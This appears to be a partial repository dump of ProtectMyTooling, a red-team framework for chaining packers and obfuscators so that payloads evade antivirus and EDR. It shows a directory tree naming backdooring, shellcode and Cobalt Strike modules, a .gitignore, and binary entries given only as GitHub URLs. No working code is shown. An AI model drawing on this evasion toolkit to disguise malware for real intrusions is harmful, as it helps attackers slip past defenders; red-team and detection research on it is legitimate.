├── .gitignore
├── CobaltStrike
├── ProtectMyTooling.cna
└── cobaltProtectMyTooling.py
├── ProtectMyTooling.py
├── ProtectMyToolingGUI.pyw
├── README.md
├── RedBackdoorer.py
├── RedWatermarker.py
├── config
├── ProtectMyTooling.yaml
└── sample-full-config.yaml
├── contrib
├── AsStrongAsFuck
│ └── AsStrongAsFuck.exe
├── AtomPePacker
│ ├── Hasher.exe
│ ├── Modules
│ │ ├── DllPP64Stub.dll
│ │ └── PP64Stub.exe
│ └── PePacker.exe
├── CallObf
│ ├── cobf64.exe
│ └── cobf86.exe
├── ConfuserEx
│ ├── active-mkaring
│ │ ├── CommonServiceLocator.dll
│ │ ├── Confuser.CLI.exe
│ │ ├── Confuser.CLI.exe.config
│ │ ├── Confuser.Core.dll
│ │ ├── Confuser.DynCipher.dll
│ │ ├── Confuser.Protections.dll
│ │ ├── Confuser.Renamer.dll
│ │ ├── Confuser.Runtime.dll
│ │ ├── ConfuserEx.exe
│ │ ├── ConfuserEx.exe.config
│ │ ├── GalaSoft.MvvmLight.Extras.dll
│ │ ├── GalaSoft.MvvmLight.Platform.dll
│ │ ├── GalaSoft.MvvmLight.dll
│ │ ├── Microsoft.DiaSymReader.Native.amd64.dll
│ │ ├── Microsoft.DiaSymReader.Native.x86.dll
│ │ ├── Microsoft.Win32.Registry.dll
│ │ ├── NDesk.Options.dll
│ │ ├── Ookii.Dialogs.Wpf.dll
│ │ ├── System.IO.FileSystem.Primitives.dll
│ │ ├── System.IO.Packaging.dll
│ │ ├── System.Security.AccessControl.dll
│ │ ├── System.Security.Principal.Windows.dll
│ │ ├── System.ValueTuple.dll
│ │ ├── System.Windows.Interactivity.dll
│ │ └── dnlib.dll
│ └── original
│ │ ├── CommonServiceLocator.dll
│ │ ├── Confuser.CLI.exe
│ │ ├── Confuser.CLI.exe.config
│ │ ├── Confuser.Core.dll
│ │ ├── Confuser.DynCipher.dll
│ │ ├── Confuser.Protections.dll
│ │ ├── Confuser.Renamer.dll
│ │ ├── Confuser.Runtime.dll
│ │ ├── ConfuserEx.exe
│ │ ├── ConfuserEx.exe.config
│ │ ├── GalaSoft.MvvmLight.Extras.dll
│ │ ├── GalaSoft.MvvmLight.Platform.dll
│ │ ├── GalaSoft.MvvmLight.dll
│ │ ├── Microsoft.DiaSymReader.Native.amd64.dll
│ │ ├── Microsoft.DiaSymReader.Native.x86.dll
│ │ ├── Microsoft.Win32.Registry.dll
│ │ ├── NDesk.Options.dll
│ │ ├── Ookii.Dialogs.Wpf.dll
│ │ ├── System.IO.FileSystem.Primitives.dll
│ │ ├── System.IO.Packaging.dll
│ │ ├── System.Security.AccessControl.dll
│ │ ├── System.Security.Principal.Windows.dll
│ │ ├── System.ValueTuple.dll
│ │ ├── System.Windows.Interactivity.dll
│ │ └── dnlib.dll
├── Hyperion
│ ├── Fasm
│ │ ├── INCLUDE
│ │ │ ├── API
│ │ │ │ ├── ADVAPI32.INC
│ │ │ │ ├── COMCTL32.INC
│ │ │ │ ├── COMDLG32.INC
│ │ │ │ ├── GDI32.INC
│ │ │ │ ├── KERNEL32.INC
│ │ │ │ ├── SHELL32.INC
│ │ │ │ ├── USER32.INC
│ │ │ │ └── WSOCK32.INC
│ │ │ ├── ENCODING
│ │ │ │ ├── UTF8.INC
│ │ │ │ ├── WIN1250.INC
│ │ │ │ ├── WIN1251.INC
│ │ │ │ ├── WIN1252.INC
│ │ │ │ ├── WIN1253.INC
│ │ │ │ ├── WIN1254.INC
│ │ │ │ ├── WIN1255.INC
│ │ │ │ ├── WIN1256.INC
│ │ │ │ ├── WIN1257.INC
│ │ │ │ ├── WIN1258.INC
│ │ │ │ └── WIN874.INC
│ │ │ ├── EQUATES
│ │ │ │ ├── COMCTL32.INC
│ │ │ │ ├── COMCTL64.INC
│ │ │ │ ├── COMDLG32.INC
│ │ │ │ ├── COMDLG64.INC
│ │ │ │ ├── GDI32.INC
│ │ │ │ ├── GDI64.INC
│ │ │ │ ├── KERNEL32.INC
│ │ │ │ ├── KERNEL64.INC
│ │ │ │ ├── SHELL32.INC
│ │ │ │ ├── SHELL64.INC
│ │ │ │ ├── USER32.INC
│ │ │ │ ├── USER64.INC
│ │ │ │ └── WSOCK32.INC
│ │ │ ├── MACRO
│ │ │ │ ├── COM32.INC
│ │ │ │ ├── COM64.INC
│ │ │ │ ├── EXPORT.INC
│ │ │ │ ├── IF.INC
│ │ │ │ ├── IMPORT32.INC
│ │ │ │ ├── IMPORT64.INC
│ │ │ │ ├── MASM.INC
│ │ │ │ ├── PROC32.INC
│ │ │ │ ├── PROC64.INC
│ │ │ │ ├── RESOURCE.INC
│ │ │ │ └── STRUCT.INC
│ │ │ ├── PCOUNT
│ │ │ │ ├── ADVAPI32.INC
│ │ │ │ ├── COMCTL32.INC
│ │ │ │ ├── COMDLG32.INC
│ │ │ │ ├── GDI32.INC
│ │ │ │ ├── KERNEL32.INC
│ │ │ │ ├── SHELL32.INC
│ │ │ │ ├── USER32.INC
│ │ │ │ └── WSOCK32.INC
│ │ │ ├── WIN32A.INC
│ │ │ ├── WIN32AX.INC
│ │ │ ├── WIN32AXP.INC
│ │ │ ├── WIN32W.INC
│ │ │ ├── WIN32WX.INC
│ │ │ ├── WIN32WXP.INC
│ │ │ ├── WIN64A.INC
│ │ │ ├── WIN64AX.INC
│ │ │ ├── WIN64AXP.INC
│ │ │ ├── WIN64W.INC
│ │ │ ├── WIN64WX.INC
│ │ │ └── WIN64WXP.INC
│ │ ├── fasm.exe
│ │ └── license.TXT
│ ├── Src
│ │ ├── Container
│ │ │ ├── 32
│ │ │ │ ├── createstrings.inc
│ │ │ │ ├── hyperion.inc
│ │ │ │ ├── loadapis.asm
│ │ │ │ ├── loadexecutable.asm
│ │ │ │ ├── logfile_disable.asm
│ │ │ │ ├── logfile_enable.asm
│ │ │ │ ├── main.asm
│ │ │ │ └── pe.inc
│ │ │ └── 64
│ │ │ │ ├── decryption_payload.asm
│ │ │ │ ├── image_base.inc
│ │ │ │ ├── image_size.inc
│ │ │ │ ├── infile_array.inc
│ │ │ │ ├── infile_size.inc
│ │ │ │ ├── key_size.inc
│ │ │ │ ├── loadexecutable.asm
│ │ │ │ ├── logfile_disable.asm
│ │ │ │ ├── logfile_enable.asm
│ │ │ │ ├── logfile_select.asm
│ │ │ │ ├── main.asm
│ │ │ │ ├── main_prolog.inc
│ │ │ │ └── pe.inc
│ │ ├── Crypter
│ │ │ ├── aes.c
│ │ │ ├── aes.o
│ │ │ ├── encryption.c
│ │ │ ├── encryption.o
│ │ │ ├── fasmoutput.c
│ │ │ ├── fasmoutput.h
│ │ │ ├── fasmoutput.o
│ │ │ ├── fileaccess.c
│ │ │ ├── fileaccess.o
│ │ │ ├── hyperion.c
│ │ │ ├── hyperion.h
│ │ │ ├── hyperion.o
│ │ │ ├── pe.h
│ │ │ ├── pe32.c
│ │ │ ├── pe32.o
│ │ │ ├── pe64.c
│ │ │ ├── pe64.o
│ │ │ ├── pe_general.c
│ │ │ ├── pe_general.o
│ │ │ ├── secure_string.c
│ │ │ ├── secure_string.o
│ │ │ ├── verbose.c
│ │ │ └── verbose.o
│ │ └── Payloads
│ │ │ └── Aes
│ │ │ ├── 32
│ │ │ ├── aes.asm
│ │ │ ├── aes.inc
│ │ │ ├── aes_constants_intern.inc
│ │ │ ├── decryptexecutable.asm
│ │ │ ├── decryptionrounds.asm
│ │ │ ├── encryptionrounds.asm
│ │ │ ├── galois.asm
│ │ │ ├── keychain.asm
│ │ │ ├── license.txt
│ │ │ ├── rcon.asm
│ │ │ └── sbox.asm
│ │ │ ├── 64
│ │ │ ├── aes.asm
│ │ │ ├── aes.inc
│ │ │ ├── aes_constants_intern.inc
│ │ │ ├── decryptexecutable.asm
│ │ │ ├── decryptionrounds.asm
│ │ │ ├── encryptionrounds.asm
│ │ │ ├── galois.asm
│ │ │ ├── keychain.asm
│ │ │ ├── license.txt
│ │ │ ├── rcon.asm
│ │ │ └── sbox.asm
│ │ │ └── c
│ │ │ ├── aes.c
│ │ │ ├── aes.h
│ │ │ ├── aes.o
│ │ │ └── unlicense.txt
│ ├── hyperion.exe
│ ├── license.txt
│ └── readme.txt
├── Invoke-Obfuscation
│ ├── Invoke-Obfuscation.ps1
│ ├── Invoke-Obfuscation.psd1
│ ├── Invoke-Obfuscation.psm1
│ ├── LICENSE
│ ├── Out-CompressedCommand.ps1
│ ├── Out-EncodedAsciiCommand.ps1
│ ├── Out-EncodedBXORCommand.ps1
│ ├── Out-EncodedBinaryCommand.ps1
│ ├── Out-EncodedHexCommand.ps1
│ ├── Out-EncodedOctalCommand.ps1
│ ├── Out-EncodedSpecialCharOnlyCommand.ps1
│ ├── Out-EncodedWhitespaceCommand.ps1
│ ├── Out-ObfuscatedAst.ps1
│ ├── Out-ObfuscatedStringCommand.ps1
│ ├── Out-ObfuscatedTokenCommand.ps1
│ ├── Out-PowerShellLauncher.ps1
│ ├── Out-SecureStringCommand.ps1
│ └── README.md
├── LoGIC.NET
│ ├── LoGiC.NET.exe
│ ├── LoGiC.NET.exe.config
│ ├── SharpConfigParser.dll
│ ├── dnlib.dll
│ └── dnlib.xml
├── MPRESS
│ ├── BugReport.txt
│ ├── FAQ.TXT
│ ├── History.txt
│ ├── license.txt
│ └── mpress.exe
├── Mangle
│ ├── Mangle.exe
│ ├── sigcheck.exe
│ └── signed-executables
│ │ ├── WINWORD.EXE
│ │ ├── autorunsc64.exe
│ │ ├── notepad.exe
│ │ └── svchost.exe
├── NimPackt-v1
│ ├── LICENSE
│ ├── NimPackt.cna
│ ├── NimPackt.py
│ ├── NimPackt.yar
│ ├── README.md
│ ├── assets
│ │ ├── AntiScan-Results-CSBeacon.png
│ │ ├── Nimpackt-Logo-Blacktext.png
│ │ └── cna_plugin.png
│ ├── dist
│ │ └── shellycoat_x64.bin
│ └── templates
│ │ ├── NimPackt-Template.nim
│ │ └── syscalls.nim
├── Nimcrypt2
│ ├── GetSyscallStub.nim
│ ├── LICENSE
│ ├── README.md
│ ├── nimcrypt.exe
│ ├── nimcrypt.nim
│ └── syscalls.nim
├── PEunion
│ ├── Config
│ │ ├── recent.ini
│ │ ├── rtlo_extension_alternatives.ini
│ │ └── viewstate.ini
│ ├── FASM
│ │ ├── FASM.EXE
│ │ └── INCLUDE
│ │ │ ├── API
│ │ │ ├── ADVAPI32.INC
│ │ │ ├── COMCTL32.INC
│ │ │ ├── COMDLG32.INC
│ │ │ ├── GDI32.INC
│ │ │ ├── KERNEL32.INC
│ │ │ ├── SHELL32.INC
│ │ │ ├── USER32.INC
│ │ │ └── WSOCK32.INC
│ │ │ ├── ENCODING
│ │ │ ├── UTF8.INC
│ │ │ ├── WIN1250.INC
│ │ │ ├── WIN1251.INC
│ │ │ ├── WIN1252.INC
│ │ │ ├── WIN1253.INC
│ │ │ ├── WIN1254.INC
│ │ │ ├── WIN1255.INC
│ │ │ ├── WIN1256.INC
│ │ │ ├── WIN1257.INC
│ │ │ ├── WIN1258.INC
│ │ │ └── WIN874.INC
│ │ │ ├── EQUATES
│ │ │ ├── COMCTL32.INC
│ │ │ ├── COMCTL64.INC
│ │ │ ├── COMDLG32.INC
│ │ │ ├── COMDLG64.INC
│ │ │ ├── GDI32.INC
│ │ │ ├── GDI64.INC
│ │ │ ├── KERNEL32.INC
│ │ │ ├── KERNEL64.INC
│ │ │ ├── SHELL32.INC
│ │ │ ├── SHELL64.INC
│ │ │ ├── USER32.INC
│ │ │ ├── USER64.INC
│ │ │ └── WSOCK32.INC
│ │ │ ├── MACRO
│ │ │ ├── COM32.INC
│ │ │ ├── COM64.INC
│ │ │ ├── EXPORT.INC
│ │ │ ├── IF.INC
│ │ │ ├── IMPORT32.INC
│ │ │ ├── IMPORT64.INC
│ │ │ ├── MASM.INC
│ │ │ ├── PROC32.INC
│ │ │ ├── PROC64.INC
│ │ │ ├── RESOURCE.INC
│ │ │ └── STRUCT.INC
│ │ │ ├── PCOUNT
│ │ │ ├── ADVAPI32.INC
│ │ │ ├── COMCTL32.INC
│ │ │ ├── COMDLG32.INC
│ │ │ ├── GDI32.INC
│ │ │ ├── KERNEL32.INC
│ │ │ ├── SHELL32.INC
│ │ │ ├── USER32.INC
│ │ │ └── WSOCK32.INC
│ │ │ ├── WIN32A.INC
│ │ │ ├── WIN32AX.INC
│ │ │ ├── WIN32AXP.INC
│ │ │ ├── WIN32W.INC
│ │ │ ├── WIN32WX.INC
│ │ │ ├── WIN32WXP.INC
│ │ │ ├── WIN64A.INC
│ │ │ ├── WIN64AX.INC
│ │ │ ├── WIN64AXP.INC
│ │ │ ├── WIN64W.INC
│ │ │ ├── WIN64WX.INC
│ │ │ └── WIN64WXP.INC
│ ├── Help
│ │ ├── App
│ │ │ └── Changelog.md
│ │ ├── Default.md
│ │ ├── Project
│ │ │ ├── Items
│ │ │ │ ├── Drop.md
│ │ │ │ ├── Invoke.md
│ │ │ │ ├── MessageBox.md
│ │ │ │ ├── RunPE.md
│ │ │ │ └── Source.md
│ │ │ ├── Manifest.md
│ │ │ ├── StartupMelt.md
│ │ │ ├── StubIcon.md
│ │ │ ├── StubPadding.md
│ │ │ ├── StubType.md
│ │ │ └── VersionInfo.md
│ │ ├── Rtlo
│ │ │ ├── Icon.md
│ │ │ ├── NewFilename.md
│ │ │ ├── OriginalFile.md
│ │ │ └── Preview.md
│ │ └── Template.html
│ ├── LICENSE-3RD-PARTY.md
│ ├── LICENSE.md
│ ├── PEunion.exe
│ ├── PEunion.exe.config
│ ├── Stub
│ │ ├── dotnet
│ │ │ ├── Api.cs
│ │ │ ├── Compression.cs
│ │ │ ├── Download.cs
│ │ │ ├── Drop.cs
│ │ │ ├── Emulator.cs
│ │ │ ├── GetResource.cs
│ │ │ ├── Invoke.cs
│ │ │ ├── Resources
│ │ │ │ ├── default.manifest
│ │ │ │ └── elevated.manifest
│ │ │ ├── RunPE.cs
│ │ │ ├── Stage2.cs
│ │ │ └── Stub.cs
│ │ └── pe32
│ │ │ ├── Api
│ │ │ ├── kernel32.inc
│ │ │ ├── msvcrt.inc
│ │ │ └── shlwapi.inc
│ │ │ ├── Compression.asm
│ │ │ ├── Download.asm
│ │ │ ├── Drop.asm
│ │ │ ├── Emulator.asm
│ │ │ ├── Melt.asm
│ │ │ ├── Obfuscator
│ │ │ ├── nop.txt
│ │ │ ├── nop_minimal.txt
│ │ │ └── register.txt
│ │ │ ├── PebApi.asm
│ │ │ ├── PebApi.inc
│ │ │ ├── Resources
│ │ │ ├── default.manifest
│ │ │ └── elevated.manifest
│ │ │ ├── RunPE.asm
│ │ │ ├── Stage2.asm
│ │ │ ├── Stub.asm
│ │ │ └── nt.inc
│ ├── lib
│ │ ├── BytecodeApi.FileFormats.dll
│ │ ├── BytecodeApi.FileIcons.dll
│ │ ├── BytecodeApi.UI.dll
│ │ ├── BytecodeApi.dll
│ │ ├── HtmlRenderer.WPF.dll
│ │ ├── HtmlRenderer.dll
│ │ ├── MarkdownSharp.dll
│ │ └── PEunion.Compiler.dll
│ ├── peubuild.exe
│ └── peubuild.exe.config
├── ScareCrow
│ ├── ScareCrow
│ ├── ScareCrow.exe
│ ├── libcrypto-3-x64.dll
│ ├── libcurl.dll
│ ├── libssl-3-x64.dll
│ ├── osslsigncode
│ └── osslsigncode.exe
├── _project-files
│ ├── CallObf
│ │ └── configExample.ini
│ ├── ConfuserEx
│ │ ├── beds-maximum.crproj
│ │ ├── maximum.crproj
│ │ ├── mkaring-maximum.crproj
│ │ └── neo-maximum.crproj
│ ├── PEunion
│ │ ├── dotnet64.peu
│ │ ├── dotnet86.peu
│ │ └── native86.peu
│ ├── enigma-projects
│ │ └── full-x86-1.enigma
│ ├── netreactor-projects
│ │ └── net-reactor-full1.nrproj
│ ├── smartassembly-projects
│ │ └── full1.saproj
│ ├── themida-projects
│ │ └── advanced-tiger-red.tmd
│ ├── vmprotect-projects
│ │ └── full-vmprotect.vmp
│ └── vmprotect
│ │ └── full-vmprotect.vmp
├── amber
│ ├── LICENSE
│ ├── amber.exe
│ └── keystone.dll
├── denim
│ └── denim.exe
├── donut
│ └── donut.exe
├── exiftool.exe
├── packer64
│ ├── Packer.exe
│ └── PackerStub.exe
├── pe2shc
│ ├── injector32.exe
│ ├── injector64.exe
│ ├── pe2shc.exe
│ ├── runshc32.exe
│ └── runshc64.exe
├── peCloakCapstone
│ ├── README.md
│ ├── SectionDoubleP.py
│ ├── SectionDoubleP.pyc
│ └── peCloak.py
├── pe_tools
│ ├── LICENSE
│ ├── README.md
│ ├── VERSION
│ ├── pe_tools
│ │ ├── __init__.py
│ │ ├── __pycache__
│ │ │ └── peresed.cpython-310.pyc
│ │ ├── pe_parser.py
│ │ ├── peresed.py
│ │ ├── rsrc.py
│ │ ├── struct3.py
│ │ ├── utils.py
│ │ └── version_info.py
│ └── setup.py
├── sRDI
│ ├── ConvertToShellcode.py
│ ├── Python.pyproj
│ └── ShellcodeRDI.py
├── sgn
│ ├── LICENSE
│ ├── keystone.dll
│ └── sgn.exe
└── upx
│ ├── upx-3.96-amd64_linux
│ ├── README
│ ├── README.1ST
│ ├── upx
│ ├── upx.1
│ └── upx.doc
│ ├── upx-3.96-i386_linux
│ ├── README
│ ├── README.1ST
│ ├── upx
│ ├── upx.1
│ └── upx.doc
│ ├── upx-3.96-win32
│ ├── README
│ ├── README.1ST
│ ├── upx.1
│ ├── upx.doc
│ └── upx.exe
│ └── upx-3.96-win64
│ ├── README
│ ├── README.1ST
│ ├── THANKS
│ ├── upx.1
│ ├── upx.doc
│ └── upx.exe
├── data
├── all-functions.txt
└── dodgy-functions.txt
├── images
├── 1.png
├── 3.png
├── 4.png
├── 5.png
└── options.png
├── install.ps1
├── install.sh
├── lib
├── __init__.py
├── logger.py
├── optionsparser.py
├── packersloader.py
└── utils.py
├── packers
├── IPacker.py
├── __init__.py
├── amber.py
├── asstrongasfuck.py
├── atompepacker.py
├── backdoor.py
├── callobf.py
├── confuserex.py
├── donut-packer.py
├── enigma.py
├── freeze.py
├── hyperion.py
├── intellilock.py
├── invobf.py
├── logicnet.py
├── mangle.py
├── mpress.py
├── netreactor.py
├── netshrink.py
├── nimcrypt2.py
├── nimpackt.py
├── nimsyscall.py
├── packer64.py
├── pe2shc.py
├── pecloak.py
├── peresed.py
├── peunion.py
├── scarecrow.py
├── sgn.py
├── smartassembly.py
├── srdi.py
├── themida.py
├── upx.py
└── vmprotect.py
└── requirements.txt
/.gitignore:
--------------------------------------------------------------------------------
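# Local build artefacts and operator-specific files that must stay out of the
# repository (the Cobalt Strike .conf and notes.txt are per-user files).
*.pyc
/CobaltStrike/cobaltProtectMyTooling.conf
/notes.txt
tests/*

# Ignore everything directly under contrib/ by default.
# This rule must come BEFORE the "!" exceptions below: within one .gitignore
# git lets the LAST matching pattern win, so a "contrib/*" placed after the
# exceptions re-ignores every directory they name and the exceptions never
# take effect.
contrib/*

# Bundled third-party tooling that is tracked on purpose.
# NOTE(review): these directories hold prebuilt executables and DLLs; record
# where each one came from and check it against the upstream release when it
# is added or updated.
!contrib/_project-files
!contrib/AsStrongAsFuck
!contrib/AtomPePacker
# Spelled as the directory is named in the tree; a lower-case pattern only
# matches where core.ignorecase is enabled.
!contrib/CallObf
!contrib/ConfuserEx
!contrib/denim
!contrib/exiftool.exe
!contrib/Hyperion
!contrib/Invoke-Obfuscation
!contrib/Mangle
!contrib/LoGIC.NET
!contrib/MPRESS
!contrib/Nimcrypt2
!contrib/NimPackt-v1
!contrib/packer64
!contrib/pe_tools
!contrib/peCloakCapstone
!contrib/sRDI
!contrib/upx

# NOTE(review): the exceptions below match nothing in the repository tree as
# listed (project files live under contrib/_project-files); kept unchanged,
# confirm whether they are still needed.
!contrib/Freeze
!contrib/project-files/
!contrib/smartassembly-projects
!contrib/vmprotect-projects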
--------------------------------------------------------------------------------
/contrib/AsStrongAsFuck/AsStrongAsFuck.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mgeeky/ProtectMyTooling/60a2c27c3f4c740b5f1a2400e15f5064f9dbfa51/contrib/AsStrongAsFuck/AsStrongAsFuck.exe
--------------------------------------------------------------------------------
/contrib/AtomPePacker/Hasher.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mgeeky/ProtectMyTooling/60a2c27c3f4c740b5f1a2400e15f5064f9dbfa51/contrib/AtomPePacker/Hasher.exe
--------------------------------------------------------------------------------
/contrib/AtomPePacker/Modules/DllPP64Stub.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mgeeky/ProtectMyTooling/60a2c27c3f4c740b5f1a2400e15f5064f9dbfa51/contrib/AtomPePacker/Modules/DllPP64Stub.dll
--------------------------------------------------------------------------------
/contrib/AtomPePacker/Modules/PP64Stub.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mgeeky/ProtectMyTooling/60a2c27c3f4c740b5f1a2400e15f5064f9dbfa51/contrib/AtomPePacker/Modules/PP64Stub.exe
--------------------------------------------------------------------------------
/contrib/AtomPePacker/PePacker.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mgeeky/ProtectMyTooling/60a2c27c3f4c740b5f1a2400e15f5064f9dbfa51/contrib/AtomPePacker/PePacker.exe
--------------------------------------------------------------------------------
/contrib/CallObf/cobf64.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mgeeky/ProtectMyTooling/60a2c27c3f4c740b5f1a2400e15f5064f9dbfa51/contrib/CallObf/cobf64.exe
--------------------------------------------------------------------------------
/contrib/CallObf/cobf86.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mgeeky/ProtectMyTooling/60a2c27c3f4c740b5f1a2400e15f5064f9dbfa51/contrib/CallObf/cobf86.exe
--------------------------------------------------------------------------------
/contrib/ConfuserEx/active-mkaring/CommonServiceLocator.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mgeeky/ProtectMyTooling/60a2c27c3f4c740b5f1a2400e15f5064f9dbfa51/contrib/ConfuserEx/active-mkaring/CommonServiceLocator.dll
--------------------------------------------------------------------------------
/contrib/ConfuserEx/active-mkaring/Confuser.CLI.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mgeeky/ProtectMyTooling/60a2c27c3f4c740b5f1a2400e15f5064f9dbfa51/contrib/ConfuserEx/active-mkaring/Confuser.CLI.exe
--------------------------------------------------------------------------------
/contrib/ConfuserEx/active-mkaring/Confuser.CLI.exe.config:
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
/contrib/ConfuserEx/active-mkaring/Confuser.Core.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mgeeky/ProtectMyTooling/60a2c27c3f4c740b5f1a2400e15f5064f9dbfa51/contrib/ConfuserEx/active-mkaring/Confuser.Core.dll
--------------------------------------------------------------------------------
/contrib/ConfuserEx/active-mkaring/Confuser.DynCipher.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mgeeky/ProtectMyTooling/60a2c27c3f4c740b5f1a2400e15f5064f9dbfa51/contrib/ConfuserEx/active-mkaring/Confuser.DynCipher.dll
--------------------------------------------------------------------------------
/contrib/ConfuserEx/active-mkaring/Confuser.Protections.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mgeeky/ProtectMyTooling/60a2c27c3f4c740b5f1a2400e15f5064f9dbfa51/contrib/ConfuserEx/active-mkaring/Confuser.Protections.dll
--------------------------------------------------------------------------------
/contrib/ConfuserEx/active-mkaring/Confuser.Renamer.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mgeeky/ProtectMyTooling/60a2c27c3f4c740b5f1a2400e15f5064f9dbfa51/contrib/ConfuserEx/active-mkaring/Confuser.Renamer.dll
--------------------------------------------------------------------------------
/contrib/ConfuserEx/active-mkaring/Confuser.Runtime.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mgeeky/ProtectMyTooling/60a2c27c3f4c740b5f1a2400e15f5064f9dbfa51/contrib/ConfuserEx/active-mkaring/Confuser.Runtime.dll
--------------------------------------------------------------------------------
/contrib/ConfuserEx/active-mkaring/ConfuserEx.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mgeeky/ProtectMyTooling/60a2c27c3f4c740b5f1a2400e15f5064f9dbfa51/contrib/ConfuserEx/active-mkaring/ConfuserEx.exe
--------------------------------------------------------------------------------
/contrib/ConfuserEx/active-mkaring/ConfuserEx.exe.config:
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
/contrib/ConfuserEx/active-mkaring/GalaSoft.MvvmLight.Extras.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mgeeky/ProtectMyTooling/60a2c27c3f4c740b5f1a2400e15f5064f9dbfa51/contrib/ConfuserEx/active-mkaring/GalaSoft.MvvmLight.Extras.dll
--------------------------------------------------------------------------------
/contrib/ConfuserEx/active-mkaring/GalaSoft.MvvmLight.Platform.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mgeeky/ProtectMyTooling/60a2c27c3f4c740b5f1a2400e15f5064f9dbfa51/contrib/ConfuserEx/active-mkaring/GalaSoft.MvvmLight.Platform.dll
--------------------------------------------------------------------------------
/contrib/ConfuserEx/active-mkaring/GalaSoft.MvvmLight.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mgeeky/ProtectMyTooling/60a2c27c3f4c740b5f1a2400e15f5064f9dbfa51/contrib/ConfuserEx/active-mkaring/GalaSoft.MvvmLight.dll
--------------------------------------------------------------------------------
/contrib/ConfuserEx/active-mkaring/Microsoft.DiaSymReader.Native.amd64.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mgeeky/ProtectMyTooling/60a2c27c3f4c740b5f1a2400e15f5064f9dbfa51/contrib/ConfuserEx/active-mkaring/Microsoft.DiaSymReader.Native.amd64.dll
--------------------------------------------------------------------------------
/contrib/ConfuserEx/active-mkaring/Microsoft.DiaSymReader.Native.x86.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mgeeky/ProtectMyTooling/60a2c27c3f4c740b5f1a2400e15f5064f9dbfa51/contrib/ConfuserEx/active-mkaring/Microsoft.DiaSymReader.Native.x86.dll
--------------------------------------------------------------------------------
/contrib/ConfuserEx/active-mkaring/Microsoft.Win32.Registry.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mgeeky/ProtectMyTooling/60a2c27c3f4c740b5f1a2400e15f5064f9dbfa51/contrib/ConfuserEx/active-mkaring/Microsoft.Win32.Registry.dll
--------------------------------------------------------------------------------
/contrib/ConfuserEx/active-mkaring/NDesk.Options.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mgeeky/ProtectMyTooling/60a2c27c3f4c740b5f1a2400e15f5064f9dbfa51/contrib/ConfuserEx/active-mkaring/NDesk.Options.dll
--------------------------------------------------------------------------------
/contrib/ConfuserEx/active-mkaring/Ookii.Dialogs.Wpf.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mgeeky/ProtectMyTooling/60a2c27c3f4c740b5f1a2400e15f5064f9dbfa51/contrib/ConfuserEx/active-mkaring/Ookii.Dialogs.Wpf.dll
--------------------------------------------------------------------------------
/contrib/ConfuserEx/active-mkaring/System.IO.FileSystem.Primitives.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mgeeky/ProtectMyTooling/60a2c27c3f4c740b5f1a2400e15f5064f9dbfa51/contrib/ConfuserEx/active-mkaring/System.IO.FileSystem.Primitives.dll
--------------------------------------------------------------------------------
/contrib/ConfuserEx/active-mkaring/System.IO.Packaging.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mgeeky/ProtectMyTooling/60a2c27c3f4c740b5f1a2400e15f5064f9dbfa51/contrib/ConfuserEx/active-mkaring/System.IO.Packaging.dll
--------------------------------------------------------------------------------
/contrib/ConfuserEx/active-mkaring/System.Security.AccessControl.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mgeeky/ProtectMyTooling/60a2c27c3f4c740b5f1a2400e15f5064f9dbfa51/contrib/ConfuserEx/active-mkaring/System.Security.AccessControl.dll
--------------------------------------------------------------------------------
/contrib/ConfuserEx/active-mkaring/System.Security.Principal.Windows.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mgeeky/ProtectMyTooling/60a2c27c3f4c740b5f1a2400e15f5064f9dbfa51/contrib/ConfuserEx/active-mkaring/System.Security.Principal.Windows.dll
--------------------------------------------------------------------------------
/contrib/ConfuserEx/active-mkaring/System.ValueTuple.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mgeeky/ProtectMyTooling/60a2c27c3f4c740b5f1a2400e15f5064f9dbfa51/contrib/ConfuserEx/active-mkaring/System.ValueTuple.dll
--------------------------------------------------------------------------------
/contrib/ConfuserEx/active-mkaring/System.Windows.Interactivity.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mgeeky/ProtectMyTooling/60a2c27c3f4c740b5f1a2400e15f5064f9dbfa51/contrib/ConfuserEx/active-mkaring/System.Windows.Interactivity.dll
--------------------------------------------------------------------------------
/contrib/ConfuserEx/active-mkaring/dnlib.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mgeeky/ProtectMyTooling/60a2c27c3f4c740b5f1a2400e15f5064f9dbfa51/contrib/ConfuserEx/active-mkaring/dnlib.dll
--------------------------------------------------------------------------------
/contrib/ConfuserEx/original/CommonServiceLocator.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mgeeky/ProtectMyTooling/60a2c27c3f4c740b5f1a2400e15f5064f9dbfa51/contrib/ConfuserEx/original/CommonServiceLocator.dll
--------------------------------------------------------------------------------
/contrib/ConfuserEx/original/Confuser.CLI.exe:
--------------------------------------------------------------------------------
